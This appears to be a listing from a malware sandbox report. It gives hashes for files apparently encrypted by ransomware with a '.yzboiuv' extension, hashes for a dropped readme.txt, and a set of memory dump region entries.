C:\Users\Admin\Desktop\DismountConnect.emf.yzboiuv

MD5
6be55fffc2180e365e82810ee782059e

SHA1
1fc55a30e4d8653d4c3e2d892f42dd89de566ede

SHA256
cda8130f47ac7b925c296cd45a92d557da1b133423f85144c0d886e1a2d4e641

SHA512
bd953235d413e89a68ec1a025fa228b97ebac3bf9051b6dc4a68c627ef75ea61bd911ad81c4ce61f72608c0fba6bf4f6034d749e9ea80bc9393444c26897c587

Download Submit
C:\Users\Admin\Desktop\ImportReceive.ppt.yzboiuv

MD5
a8527c9ef13711429bdfe32b1a48ff4e

SHA1
90c47e90d564c4f09ad4d1743d8d2e6970d520a2

SHA256
8b28493dbcd1954ebf7270c87afe2be336d5aad323be155ecfd2bd991c7c9165

SHA512
d03924de6ea9fb370b12f6bcfd2052b4dd5ec8efd5c886f4bd9687b05b310fd416a4646a27dc94096d8ca15dabfecc8e46fc18583192fdf44aafadf9a35ea531

Download Submit
C:\Users\Admin\Desktop\InvokeResume.ppsm.yzboiuv

MD5
0e3a992867b4eb31141787a9476eb512

SHA1
d757ea24e6236ebcd57691837adc8d64064d0fdc

SHA256
17ddcf1e7eda55394c3dafbb528b5cc9145cbd0a8ea75eee66698b85fc6abd65

SHA512
bed43e712eabdf55c0114ed249b6ede946ac6636c3b7a4b84d9681ca46725f05e5f2ce4bb2aa1d29841786ed9d1dc8abc870a483125879dd410755859c93a42c

Download Submit
C:\Users\Admin\Desktop\LockAssert.vsdx.yzboiuv

MD5
5e77f822afb675cfff63330e018631d1

SHA1
e8bfc705c6d66b6e64c0ff289306f9df7d980d57

SHA256
dada74f35a39dff2e03bb4b6f6a1d12ea2bf3b0b1313829af5014eb36e718405

SHA512
ab30be6a300edcaf5b0526319d8fb3ed128edd89f5ad73a0540b5d45da8dbc3d4fdcd257d9525cc35bae8de9df0579231a036c150141d6b419a8ca51921673c8

Download Submit
C:\Users\Admin\Desktop\PushCheckpoint.docx.yzboiuv

MD5
82310aa16d3f3e715a5a7af493652180

SHA1
0835fc1e99837e1103cfc9ce1effa4b2afab1aa1

SHA256
b61764cfe36f2796508a21a05efabda48880ec11ebb4b2c180c911822840ea16

SHA512
453f3306d04c9b3d328e21109876732d098200cd5b387e99d6219319ee291d73b0e2970f4bcc25397a84806f2c53bb5903aa1a14e54684ac222241c1bdb66e22

Download Submit
C:\Users\Admin\Desktop\ResetFormat.rtf.yzboiuv

MD5
43beb7b94ba16fcc5530d8f59a1bc0d5

SHA1
ab5db11b52e3bcdb6440ebfa16ba41529a78951a

SHA256
fb707e80d4f38b0e404b95033db2eb0b1472c701720645cb6352b228afb41d55

SHA512
672762d85f615395f5d32c301679f5012a4c6cbc90fcd4100a60b56abd32ad464315dd18fd62dd97a45c01670836433e0746d36711150e04152185483a2e66f1

Download Submit
C:\Users\Admin\Desktop\ResizeResolve.xls.yzboiuv

MD5
129d1a223843366f0de528d8e67e4dbc

SHA1
1ba639a32a30179bdc77516a65beb45fe6d5cc8e

SHA256
aa44aec453d2315ea5425eae53ff6619249b27a27c0c11ab884e9e06e32826b4

SHA512
573e6909a63eb764d0ece2d8e8629e831ef14ac72299b9b867a06146260820de3968adf9773e7d216d3f9a9a60c37ab7107c6f8de891059e6e6d273dd9f24123

Download Submit
C:\Users\Admin\Desktop\RestoreInvoke.wmv.yzboiuv

MD5
2b5318971f417c0afe2047c5ac97d160

SHA1
d67d67f7c4b9f052444084b4ce1a45072ae37eb7

SHA256
5bceeb331f2a40adb30518b143902556924f8d3fa3b3a27b312e91af2fdb029c

SHA512
a98e62a62c694ea60b2523518df63d4055b0338139cefca4426cf6a8c3c36b594e2ed3c16c5b86d78056bad482b4fd4a5019771ec77712da70cc085b606fbc13

Download Submit
C:\Users\Admin\Desktop\ResumeSet.wmv.yzboiuv

MD5
eef656beeb8d765daad41883361b28c1

SHA1
659ec07bcd9f20b507d938c8e9075d33f4019c34

SHA256
7b34c90a2d8920d6b90439d7238ec3dbd1df681dedd20c961b5c107ad2da4221

SHA512
bbbb964cb7cd2a2d613ebcebadf726f6e88494d71b8e041dc9f6d839b905f5aa81b83888c4e9d705882504f3e0afe7da53ae16f55ce5b8b6c1fdc0102de280fc

Download Submit
C:\Users\Admin\Desktop\UnprotectMeasure.xltx.yzboiuv

MD5
61cd94b7136fe2cd7b02ff4fd2d66356

SHA1
f61fb8bf062448e0850bb19e472573715f4fcc13

SHA256
c774d3d85c86d988d4c163b3e2e9944988c71d81a67b1177a9a553e10324a75c

SHA512
b21ae7128358fefcc1c0dbdae8b72761d07b47bccdb92788084b54b3893ab382dd5769305032e1b0897f27b49319e42a2ab00ac9bda98e1e23ed0869ab33513c

Download Submit
C:\Users\Admin\Desktop\UnprotectRequest.avi.yzboiuv

MD5
0dea3790f5d16985f185dbabf5d316cf

SHA1
a1cefcf8007d4701fe979b1e5628caa19c552ada

SHA256
89540a68f215e58c0198268872e5db220e77077ca529ec364eca546f6acf4d62

SHA512
e241e172efdd0ff737d6c6a824dc563a20952932155936cdfc0ff29728b1b41c84c3d4e9a0968466a28501bb7d2dbabfb933fc55c209cb8ae2baa58ca5d1c960

Download Submit
C:\Users\Admin\Desktop\UpdateWatch.mid.yzboiuv

MD5
6c74ef156ff64ce5b075b81b8acfd2ce

SHA1
67d45a966b8faf5fee697d38236625517e186986

SHA256
e49eb440e0d115dc949d70aa9dcb45318fed0ecfa217edf12c9bb822b8877efa

SHA512
fbd89eb935e5b55f37d073a9e0f971dc0c385f24e18a79f02d3452498841b0bc527bb2ce9377b2a32141089ba6757fa3c519861c0b0e9064e9b73f0c2d1432e1

Download Submit
C:\Users\Admin\Desktop\readme.txt

MD5
cf559d3eb9dee858b3f7f40dcfa3ab8f

SHA1
18bcbf573dc99761d4e9495d827499edb52d5cb6

SHA256
65251efaecc1cf57b18dea7d6490390323b73fe7603427ddac44bf917995d730

SHA512
f8f430a3ffe7af62e8b1c3b4421758811f13673bdde508189bb8baadf1315ff10b3215022bec65c42aa989d3c74d58c504d41b9fd23a27320514a3e62ab07b5b

Download Submit
C:\Users\Public\readme.txt

MD5
cf559d3eb9dee858b3f7f40dcfa3ab8f

SHA1
18bcbf573dc99761d4e9495d827499edb52d5cb6

SHA256
65251efaecc1cf57b18dea7d6490390323b73fe7603427ddac44bf917995d730

SHA512
f8f430a3ffe7af62e8b1c3b4421758811f13673bdde508189bb8baadf1315ff10b3215022bec65c42aa989d3c74d58c504d41b9fd23a27320514a3e62ab07b5b

Download Submit
memory/524-130-0x0000000000000000-mapping.dmp

Download
memory/732-123-0x0000000000000000-mapping.dmp

Download
memory/748-121-0x0000000000000000-mapping.dmp

Download
memory/868-106-0x0000000000000000-mapping.dmp

Download
memory/1088-126-0x0000000000000000-mapping.dmp

Download
memory/1140-146-0x0000000001DE0000-0x0000000001DE4000-memory.dmp

Filesize
16KB

Download
memory/1168-122-0x0000000000000000-mapping.dmp

Download
memory/1476-107-0x0000000000000000-mapping.dmp

Download
memory/1536-97-0x0000000000000000-mapping.dmp

Download
memory/1564-96-0x0000000000000000-mapping.dmp

Download
memory/1676-95-0x0000000001D20000-0x0000000001D21000-memory.dmp

Filesize
4KB

Download
memory/1676-61-0x0000000000180000-0x0000000000181000-memory.dmp

Filesize
4KB

Download
memory/1676-88-0x0000000001CB0000-0x0000000001CB1000-memory.dmp

Filesize
4KB

Download
memory/1676-93-0x0000000001D00000-0x0000000001D01000-memory.dmp

Filesize
4KB

Download
memory/1676-59-0x0000000000020000-0x0000000000025000-memory.dmp

Filesize
20KB

Download
memory/1676-98-0x0000000001D30000-0x0000000001D31000-memory.dmp

Filesize
4KB

Download
memory/1676-94-0x0000000001D10000-0x0000000001D11000-memory.dmp

Filesize
4KB

Download
memory/1676-89-0x0000000001CC0000-0x0000000001CC1000-memory.dmp

Filesize
4KB

Download
memory/1676-90-0x0000000001CD0000-0x0000000001CD1000-memory.dmp

Filesize
4KB

Download
memory/1676-142-0x0000000001FC0000-0x0000000001FC1000-memory.dmp

Filesize
4KB

Download
memory/1676-63-0x00000000001A0000-0x00000000001A1000-memory.dmp

Filesize
4KB

Download
memory/1676-60-0x0000000000070000-0x0000000000071000-memory.dmp

Filesize
4KB

Download
memory/1676-62-0x0000000000190000-0x0000000000191000-memory.dmp

Filesize
4KB

Download
memory/1792-72-0x0000000000000000-mapping.dmp

Download
memory/1792-77-0x000007FEFC301000-0x000007FEFC303000-memory.dmp

Filesize
8KB

Download
memory/1828-124-0x0000000000000000-mapping.dmp

Download
memory/1916-125-0x0000000000000000-mapping.dmp

Download
memory/1992-127-0x0000000000000000-mapping.dmp

Download
memory/1992-137-0x0000000000210000-0x0000000000212000-memory.dmp

Filesize
8KB

Download
memory/1992-128-0x00000000767B1000-0x00000000767B3000-memory.dmp

Filesize
8KB

Download
memory/2016-129-0x0000000000000000-mapping.dmp

Download
memory/2056-131-0x0000000000000000-mapping.dmp

Download
memory/2072-132-0x0000000000000000-mapping.dmp

Download
memory/2248-138-0x0000000000000000-mapping.dmp

Download
memory/2256-139-0x0000000000000000-mapping.dmp

Download
memory/2272-140-0x0000000000000000-mapping.dmp

Download
memory/2280-141-0x0000000000000000-mapping.dmp

Download